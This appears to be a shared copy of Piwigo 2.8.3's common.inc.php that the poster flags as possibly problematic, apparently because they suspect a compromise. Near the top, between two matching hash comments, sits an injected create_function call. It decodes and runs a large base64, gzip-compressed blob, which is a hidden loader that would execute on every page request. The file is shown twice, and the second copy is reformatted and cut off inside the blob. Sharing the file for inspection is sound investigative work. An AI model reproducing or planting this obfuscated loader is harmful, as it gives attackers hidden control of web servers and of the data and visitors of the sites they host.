helmuc/possibly problematic Piwigo 2.8.3 common.inc.php file

## possibly problematic Piwigo 2.8.3 common.inc.php file
<?php
// +-----------------------------------------------------------------------+
// | Piwigo - a PHP based photo gallery                                    |
// +-----------------------------------------------------------------------+
// | Copyright(C) 2008-2016 Piwigo Team                  http://piwigo.org |
// | Copyright(C) 2003-2008 PhpWebGallery Team    http://phpwebgallery.net |
// | Copyright(C) 2002-2003 Pierrick LE GALL   http://le-gall.net/pierrick |
// +-----------------------------------------------------------------------+
// | This program is free software; you can redistribute it and/or modify  |
// | it under the terms of the GNU General Public License as published by  |
// | the Free Software Foundation                                          |
// |                                                                       |
// | This program is distributed in the hope that it will be useful, but   |
// | WITHOUT ANY WARRANTY; without even the implied warranty of            |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU      |
// | General Public License for more details.                              |
// |                                                                       |
// | You should have received a copy of the GNU General Public License     |
// | along with this program; if not, write to the Free Software           |
// | Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, |
// | USA.                                                                  |
// +-----------------------------------------------------------------------+

defined('PHPWG_ROOT_PATH') or trigger_error('Hacking attempt!', E_USER_ERROR);

// determine the initial instant to indicate the generation time of this page
$t2 = microtime(true);

// @set_magic_quotes_runtime(0); // Disable magic_quotes_runtime

//
// addslashes to vars if magic_quotes_gpc is off this is a security
// precaution to prevent someone trying to break out of a SQL statement.
//
if( !@get_magic_quotes_gpc() )
{
  function sanitize_mysql_kv(&$v, $k)
  {
    $v = addslashes($v);
  }
  if( is_array( $_GET ) )
  {
    array_walk_recursive( $_GET, 'sanitize_mysql_kv' );
  }
  if( is_array( $_POST ) )
  {
    array_walk_recursive( $_POST, 'sanitize_mysql_kv' );
  }
  if( is_array( $_COOKIE ) )
  {
    array_walk_recursive( $_COOKIE, 'sanitize_mysql_kv' );
  }
}
if ( !empty($_SERVER["PATH_INFO"]) )
{
  $_SERVER["PATH_INFO"] = addslashes($_SERVER["PATH_INFO"]);
}

//
// Define some basic configuration arrays this also prevents malicious
// rewriting of language and otherarray values via URI params
//
$conf = array();
$page = array(
  'infos' => array(),
  'errors' => array(),
  'warnings' => array(),
  );
$user = array();
$lang = array();
$header_msgs = array();
$header_notes = array();
$filter = array();
//09d2ea9c8372688b931efcff0fe725be
create_function('', gzuncompress(base64_decode("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")));
//09d2ea9c8372688b931efcff0fe725be

foreach(
  array(
    'gzopen'
    ) as $func)
{
  if (!function_exists($func))
  {
    include_once(PHPWG_ROOT_PATH . 'include/php_compat/'.$func.'.php');
  }
}

include(PHPWG_ROOT_PATH . 'include/config_default.inc.php');
@include(PHPWG_ROOT_PATH. 'local/config/config.inc.php');

defined('PWG_LOCAL_DIR') or define('PWG_LOCAL_DIR', 'local/');

@include(PHPWG_ROOT_PATH.PWG_LOCAL_DIR .'config/database.inc.php');
if (!defined('PHPWG_INSTALLED'))
{
  header('Location: install.php');
  exit;
}
include(PHPWG_ROOT_PATH .'include/dblayer/functions_'.$conf['dblayer'].'.inc.php');

if(isset($conf['show_php_errors']) && !empty($conf['show_php_errors']))
{
  @ini_set('error_reporting', $conf['show_php_errors']);
  @ini_set('display_errors', true);
}

include(PHPWG_ROOT_PATH . 'include/constants.php');
include(PHPWG_ROOT_PATH . 'include/functions.inc.php');
include(PHPWG_ROOT_PATH . 'include/template.class.php');
include(PHPWG_ROOT_PATH . 'include/cache.class.php');
include(PHPWG_ROOT_PATH . 'include/Logger.class.php');

$persistent_cache = new PersistentFileCache();

// Database connection
try
{
  pwg_db_connect($conf['db_host'], $conf['db_user'],
                 $conf['db_password'], $conf['db_base']);
}
catch (Exception $e)
{
  my_error(l10n($e->getMessage()), true);
}

pwg_db_check_charset();

load_conf_from_db();

$logger = new Logger(array(
  'directory' => PHPWG_ROOT_PATH . $conf['data_location'] . $conf['log_dir'],
  'severity' => $conf['log_level'],
  // we use an hashed filename to prevent direct file access, and we salt with
  // the db_password instead of secret_key because the log must be usable in i.php
  // (secret_key is in the database)
  'filename' => 'log_' . date('Y-m-d') . '_' . sha1(date('Y-m-d') . $conf['db_password']) . '.txt',
  'globPattern' => 'log_*.txt',
  'archiveDays' => $conf['log_archive_days'],
  ));

if (!$conf['check_upgrade_feed'])
{
  if (!isset($conf['piwigo_db_version']) or $conf['piwigo_db_version'] != get_branch_from_version(PHPWG_VERSION))
  {
    redirect(get_root_url().'upgrade.php');
  }
}

ImageStdParams::load_from_db();

session_start();
load_plugins();

// users can have defined a custom order pattern, incompatible with GUI form
if (isset($conf['order_by_custom']))
{
  $conf['order_by'] = $conf['order_by_custom'];
}
if (isset($conf['order_by_inside_category_custom']))
{
  $conf['order_by_inside_category'] = $conf['order_by_inside_category_custom'];
}

include(PHPWG_ROOT_PATH.'include/user.inc.php');

if (in_array( substr($user['language'],0,2), array('fr','it','de','es','pl','hu','ru','nl','tr','da') ) )
{
  define('PHPWG_DOMAIN', substr($user['language'],0,2).'.piwigo.org');
}
elseif ('zh_CN' == $user['language']) {
  define('PHPWG_DOMAIN', 'cn.piwigo.org');
}
elseif ('pt_BR' == $user['language']) {
  define('PHPWG_DOMAIN', 'br.piwigo.org');
}
else {
  define('PHPWG_DOMAIN', 'piwigo.org');
}
define('PHPWG_URL', 'http://'.PHPWG_DOMAIN);

if(isset($conf['alternative_pem_url']) and $conf['alternative_pem_url']!='')
{
  define('PEM_URL', $conf['alternative_pem_url']);
}
else
{
  define('PEM_URL', 'http://'.PHPWG_DOMAIN.'/ext');
}

// language files
load_language('common.lang');
if ( is_admin() || (defined('IN_ADMIN') and IN_ADMIN) )
{
  load_language('admin.lang');
}
trigger_notify('loading_lang');
load_language('lang', PHPWG_ROOT_PATH.PWG_LOCAL_DIR, array('no_fallback'=>true, 'local'=>true) );

// only now we can set the localized username of the guest user (and not in
// include/user.inc.php)
if (is_a_guest())
{
  $user['username'] = l10n('guest');
}

// in case an auth key was provided and is no longer valid, we must wait to
// be here, with language loaded, to prepare the message
if (isset($page['auth_key_invalid']) and $page['auth_key_invalid'])
{
  $page['errors'][] =
    l10n('Your authentication key is no longer valid.')
    .sprintf(' <a href="%s">%s</a>', get_root_url().'identification.php', l10n('Login'))
    ;
}

// template instance
if (defined('IN_ADMIN') and IN_ADMIN )
{// Admin template
  $template = new Template(PHPWG_ROOT_PATH.'admin/themes', $conf['admin_theme']);
}
else
{ // Classic template
  $theme = $user['theme'];
  if (script_basename() != 'ws' and mobile_theme())
  {
    $theme = $conf['mobile_theme'];
  }
  $template = new Template(PHPWG_ROOT_PATH.'themes', $theme );
}

if ( !isset($conf['no_photo_yet']) )
{
  include(PHPWG_ROOT_PATH.'include/no_photo_yet.inc.php');
}

if (isset($user['internal_status']['guest_must_be_guest'])
    and
    $user['internal_status']['guest_must_be_guest'] === true)
{
  $header_msgs[] = l10n('Bad status for user "guest", using default status. Please notify the webmaster.');
}

if ($conf['gallery_locked'])
{
  $header_msgs[] = l10n('The gallery is locked for maintenance. Please, come back later.');

  if ( script_basename() != 'identification' and !is_admin() )
  {
    set_status_header(503, 'Service Unavailable');
    @header('Retry-After: 900');
    header('Content-Type: text/html; charset='.get_pwg_charset());
    echo '<a href="'.get_absolute_root_url(false).'identification.php">'.l10n('The gallery is locked for maintenance. Please, come back later.').'</a>';
    echo str_repeat( ' ', 512); //IE6 doesn't error output if below a size
    exit();
  }
}

if ($conf['check_upgrade_feed'])
{
  include_once(PHPWG_ROOT_PATH.'admin/include/functions_upgrade.php');
  if (check_upgrade_feed())
  {
    $header_msgs[] = 'Some database upgrades are missing, '
      .'<a href="'.get_absolute_root_url(false).'upgrade_feed.php">upgrade now</a>';
  }
}

if (count($header_msgs) > 0)
{
  $template->assign('header_msgs', $header_msgs);
  $header_msgs=array();
}

if (!empty($conf['filter_pages']) and get_filter_page_value('used'))
{
  include(PHPWG_ROOT_PATH.'include/filter.inc.php');
}
else
{
  $filter['enabled'] = false;
}

if (isset($conf['header_notes']))
{
  $header_notes = array_merge($header_notes, $conf['header_notes']);
}

// default event handlers
add_event_handler('render_category_literal_description', 'render_category_literal_description');
if ( !$conf['allow_html_descriptions'] )
{
  add_event_handler('render_category_description', 'nl2br');
}
add_event_handler('render_comment_content', 'render_comment_content');
add_event_handler('render_comment_author', 'strip_tags');
add_event_handler('render_tag_url', 'str2url');
add_event_handler('blockmanager_register_blocks', 'register_default_menubar_blocks', EVENT_HANDLER_PRIORITY_NEUTRAL-1);
if ( !empty($conf['original_url_protection']) )
{
  add_event_handler('get_element_url', 'get_element_url_protection_handler');
  add_event_handler('get_src_image_url', 'get_src_image_url_protection_handler');
}
trigger_notify('init');
?>
	<?php
	// +-----------------------------------------------------------------------+
	// \| Piwigo - a PHP based photo gallery \|
	// +-----------------------------------------------------------------------+
	// \| Copyright(C) 2008-2016 Piwigo Team http://piwigo.org \|
	// \| Copyright(C) 2003-2008 PhpWebGallery Team http://phpwebgallery.net \|
	// \| Copyright(C) 2002-2003 Pierrick LE GALL http://le-gall.net/pierrick \|
	// +-----------------------------------------------------------------------+
	// \| This program is free software; you can redistribute it and/or modify \|
	// \| it under the terms of the GNU General Public License as published by \|
	// \| the Free Software Foundation \|
	// \| \|
	// \| This program is distributed in the hope that it will be useful, but \|
	// \| WITHOUT ANY WARRANTY; without even the implied warranty of \|
	// \| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU \|
	// \| General Public License for more details. \|
	// \| \|
	// \| You should have received a copy of the GNU General Public License \|
	// \| along with this program; if not, write to the Free Software \|
	// \| Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, \|
	// \| USA. \|
	// +-----------------------------------------------------------------------+

	defined('PHPWG_ROOT_PATH') or trigger_error('Hacking attempt!', E_USER_ERROR);

	// determine the initial instant to indicate the generation time of this page
	$t2 = microtime(true);

	// @set_magic_quotes_runtime(0); // Disable magic_quotes_runtime

	//
	// addslashes to vars if magic_quotes_gpc is off this is a security
	// precaution to prevent someone trying to break out of a SQL statement.
	//
	if( !@get_magic_quotes_gpc() )
	{
	function sanitize_mysql_kv(&$v, $k)
	{
	$v = addslashes($v);
	}
	if( is_array( $_GET ) )
	{
	array_walk_recursive( $_GET, 'sanitize_mysql_kv' );
	}
	if( is_array( $_POST ) )
	{
	array_walk_recursive( $_POST, 'sanitize_mysql_kv' );
	}
	if( is_array( $_COOKIE ) )
	{
	array_walk_recursive( $_COOKIE, 'sanitize_mysql_kv' );
	}
	}
	if ( !empty($_SERVER["PATH_INFO"]) )
	{
	$_SERVER["PATH_INFO"] = addslashes($_SERVER["PATH_INFO"]);
	}

	//
	// Define some basic configuration arrays this also prevents malicious
	// rewriting of language and otherarray values via URI params
	//
	$conf = array();
	$page = array(
	'infos' => array(),
	'errors' => array(),
	'warnings' => array(),
	);
	$user = array();
	$lang = array();
	$header_msgs = array();
	$header_notes = array();
	$filter = array();
	//09d2ea9c8372688b931efcff0fe725be
	create_function('', gzuncompress(base64_decode("eAHNWmlz4rgW/d5V8x/oqlQnrsmbsWUb8DDMy8KSpAkJDnaAqS4KsAkOZinWLJ3//q68SLJsHDLd9d7LlxhLurrL0dHVld8yzjBz9Nmyh87Uto4OT6vlerNbKp/XTvVy6VAQMq+f/MZY23FmtVjbQuHTL58yw/V0sHJm08y0K+fh7+jAEV4PesXTxaL3fHTYMKxK09WHDUm/a1Y00xhvi4fHh70LXRyUZpuabMnWszoaTPVJX76SO/eX6zbKr6375aZ3r447rYf1oDrawhBOUk03x1hS+1F3OqXxS73UVm9Klceb0mjUfmyj9qM7vm5ejTqP5mMdddzO5BJ3J1LESumubA6NcsW4Oy3ippqjbKyqtulfXG9qE8m1qpVxu6WPoMlT1+9lVevbGye/Cd9eXOOxA7m+DN5iSZIyqzmz3782xK+lxgw/z6/OtRc8pmqOOlXzGR7bSFtbVXNt+YIHqD7r3Euu10l7Cd9WK2Iv0G/rqTmgbwYt0x1MPTfcBo30jS6axqU/8rI8MszK6eb6TtmCPljhu7LWNEuzh+hsQWPjvv7YaZ2JtfunUX9iSe17y71xzty+I0mD5ye3/7h6um2erutgHwgwW3V34EhnHQTGgEwTWa51nn+qPZalUCLY2p+Yj1bV3fQfZw9t9LQZIKN+/uBJ6FUZg7VnYjt5vCmdem6mPrpFlUCaNO209HIfQWdUUY1qZdppeJ66mprP/ZKIB+LHXtN7NMambhpm0/TQ6DkPWl86LcCKZ4DX666iGwbuIZp3LbFyoRuqgeVM3G37Xh8PJubL4CWUV29KegV6lfWKB7KribRpT9xlx59xd8x3GdGsui/WeUcaTLaaF6FdoOEEXMOaWQyeycB0sz+il7oZjJ/mA7kxsVpXy1vfwbsF1CR93r83N1arkb08f1h/dcabnj/oVv5fRWV6BSxgPkPsngMDgijf6UanAri48yJcAfYwt1YVY3+A3R/0OmuI9YpR0YfNcuVGl8wzXTQwtrh13KjWN/1JZ94RPcgaonRmAAFiIJljt6SbhARTmsyy3mxJMJ3buWqI5tA0r65hqh2vQfaZMa5fAkgv7gwVQ9EDrOGTwjvNTUM7vzOe+FE7Xutl7aYpXQ0bAYHq5qhxZ15VQLv0plvDtc7uTa3UMEBTU6vcV86ujLHnQhiZ1myIrgEjkkamNNV862vIW+M7FvRenfotjGZP06C/5ctuVPUN3rbaLfe0j9ds2Ys5+xroetoxfCjEmef8wWOqvr80vHET7blRxUtNPwWfsq/6k9VL49QbkEBipOdFuPQ8ASAjmARLu6jPYcs5JZD19U2Q5rvrGuO7jxT8z9sD/d2O2Q6DTS/w7mVTqmOavPHN8jEPBCqdQXgbWErCVDUR705ng9pLZVBzHrbDUnl+WbrcXp+f3d49a3M8N901ayIsr6nu9qeNlXnhbjvmNnt5obv2hT6ooZHYv9+GTMOMIgb77guimKBMe/K0aaOV2/E7NqvaI+QAc/BBNthMdxghbfOtc83pI11tlZRQhXOnsT0UCgt7tV5MM/3e0s4qXcsezCz76KD394HzTSi8ZTJBnhWmUKJwHD5KglDgWhFtleOtCm1VoXXg9pbLzOmDPV1dNJu3jbW9eH4lOdvQz9m6Rweb4Ek8Jo8SfUT0US4ejlar+aHwutw6q8GIDpWF1wEYSBLBrPAHkSUXQ4NyQqG/sHvjQqRvPrGvFvYFD/TW7uqPwI/Dnru0C2/O8OgznV4pngyXs8F4Nren9K2c+Y0okWybSm3LHoPLhMgkJ8PtwllBsEIHKbQ7EgrkdY4YKIlCYTtyXPvo89CeDZmRgkC7Z34DdcEPFtN+nJc0kHkyHLizJTulUMCmzhf2Q3fSwz4PnSlJAlUnRx/znBWBST0vJyeDkVD8K0NUyv8tfaOwk7k2hIEaww0DHA2y/tBHklg8mfcWS7u7XrjUQAgn2GFP5qtn+lIS/yYKKcI34fv3TEoPFXpEA0QnlYopA7Mw8N9kohwDN1aBvPDNc3WKIA1rwEwKgSSIR6LAwI0RjCQQTAYhghWEIgOkzG+hikiGFvJDiXSjHkPgD6Zblh2TY3/k2R8QB6JLrniwGjnLf/0VpwJGf1kUvh1/3u0VGewT/k2EsiOR8O2P0A5ZZuDKcArbH2Mg5EsiMFd4e/OZLFSz233d9BYUvRI4de26hehLoJ34S8V/GQczg2YJAZx9xxBQoyLRR0IFvhWmsrcc0R4lrpkuO4/KLBsSCzKlTOMCg3h9aORllYmvjGEAC8+eetuMf64/b+q1rqHX2H4YIbTfQfeurEOCSZajDKuB7a5Fup/E+isAEqa/IkX6x7sDMtjuGPDUwarHFeR3LvO5WMx4vB8PjEIDkyPaKwCkOI5oM6ycwluE6hPorQux+ikBUlJj8sO25tJtxbS2j60/y9goUnYCUMV0mQJAFbPKj/pGBZil4ECV9/XNT3KOirmcGs0554etxbAOUE0XD0G9CtvgfkjwgA+7dULSoeaAxTkuYrIimnsQBXBqEWolJlA5LDP4Syb0BJr2uzMpxLtknby0PTns+pZ2kDgxBBj6w9ys4r13Z8Aph6vRVRPjy2yUXrNReo3TcTbKr1nMr1SNuHi88VJtsnhHod0TxOOMiukf3UwS+uPdZDe8d2M2CxlXCJ4g8Y/lAj4iYhDKJm3/kKnHc4J88fBhNntw7f5s9X3prhfz75PlFP/oO9MH73/PsdbLuWPZi0Muy9CKh72ptZg51ndnPppN7e9bZ2rNtsuM/2sy68NxgBuFxCJSNSSKYlQakna8R8WsqOSh+84VwSYWkD/SfBwO8BNLJaeGnMgFArF5RuhL+p+uNKQwuS9Siyfr6dJeOD3XeWHOK2niorJwsu0sl/aKea0Stsp5/M9TTZauQcT0xTSfLg2YHrTniItZ0aw0nDykS/NOIry0fLJumHXTpcEGHtdNS5YWHFJS/OafUaKWAt4IdzGW5oFV0nXLJ0UBUJoo7d0o5JOigJjUmtUNRyGFusM9io9C1ksW8SrPfPmS4Vv9VBK3hgdJfJnFMUzKGgtnTdgZ85g0+fnylCTzWeE4zox5L/gBAX5UF5yVALSSlMH7Dq+MxiijJSmj4V0mxTE7qRfTRXQHR9k0qsL9mVWf9cz4PASi7NpPznK1jDSyZJYrWs5i2puwjJNljrQoXzxZrnosp0DRCZx0MhnDSE7uyWA0mTFVGJQ9FnM5GHCymq3Z8hZi6isoT0hKw8sDchrO04ilqWw6ijlXQCUl3A25JZyl0YNCEXNcQtr7M7DeplNES5Innv8f7FV3MJuuoGYIUfB1oOdurC35Y5ypQelsDy0YNWSmIIfY+pEM7LL/tDi0VA9cBuRKgBIpa2lQMBW+fDk6GbpQKWQGHdduzr92yy1ofk0o+QVeCk7UhPmgLILLdYmyjHpyJY/Hmywdi9ks4PctlekCj1OVkUbLfTIkwNgJOHqTlYNXxv7uE36l9iDhz2LGE5DGAankmKCop1xkZX9AuxQu2kePgB8TZg8TeZQFRGScZRcXent9qNvGlnKaM1IJMXBGlBdlOZrxyUr0N1K533x/9T1ejceAKXIjmQEOLj/5wSDuUNmdnS9zIZlplflWmRkrq7FWOZKFapBLxrpEE1XN20/5upSGTx47mMbfDT/zNr2X30ZdAGVKZr+Rgcm5dpUpy4GvoczH9UjLgFkCzPIHaZi68GbD7QZN3uPzp0nnwesJBG7gardQIwwXln8pQGqu9tPcxbdTYc1Ww6f9EBwwLNnxlJcktqIpQ2mO852C6ZoIhN7kWVbYWrqW9/bsD4eSqKrgqwRu9jTPsemIDPWMqN4IYh6Khmo+i49Y2VaO4iNiLbaeL6TLuVjun6ooFSgzOYmsxKETUy1NLiMWiwpzkNBqOakIHzBN5B/Hdvkom8la9LfCn39/Fvsx6wz9X9BfPkp/kC/xtCFrkS6S6N0n8fwniV7KyQFUEbmxKCUd+zk0CZW+QIlhcHscwQH9gQkyhJEikdsvSQS2w2zALbUPsjVWg5H+AWn8zHDjgfXhuBIuMvbkSkmE23dGlx1kSR1Dn9gyJLiIM4JjFBgGLk1gEqwqNzRtxTNLRIHb/mgYsDN2pKQ/Bz7aPyBoTkXIgaNvIjQN2XnQ/A4+vR2cQIhez0picA3FTfJBgMJKp6CAUsf+0mIA1cg+zUjcFSaKLvIUgVlMlRjMIgsXUr+o5rHuO2EJXPTKDd4Xl3BNzM0KPsCkQeIl/yV+UDo7+NfguMNPA7eZIT2/gx5w0tteh7cgCpEYyEXxxykQdGUQFotTmqt5hGGzo979893z4D5HIM/2aGagvH/u2euE57uVxjS628ehwRxS4KjFoSv9gKNEzyeSiK91Y1cpkogreh9YlWABC4p/fg11FK8uSiLUi+HuPMznJVFjPoSBj5XI1xkSfE0E5pCO8A1EknESVHDZXt63KbEcBRJ76BV3jeQd3liERa728Z6WUMuUJPYUQi/5Jcm7VQpSVf92aKcIqHcS0mBEwEc7tOLpi+BTX7Y35F4kNw6uoz6AUi/QWMMY7KJHyoAqwn+xVfpPDjdRGlXSjzgeYxOKhSXjj36HCrG+OzITlWzGodQ0WmIzE0jeedVhcUUPyQrRcB/pCe4kMSUQUVRc1aXivO97ku0/CgvS3W7lslbudtll5H3jFVzzn55flLu3p80LJiGGazT85VBcMsNofp4cnhu7tzd3zb+ZLwe+ltsA4Vd703OPogXdgx19C1BjX3lfUDIWpkIQ4oovU4g/omdcAtTIyZi3jLGIOU4D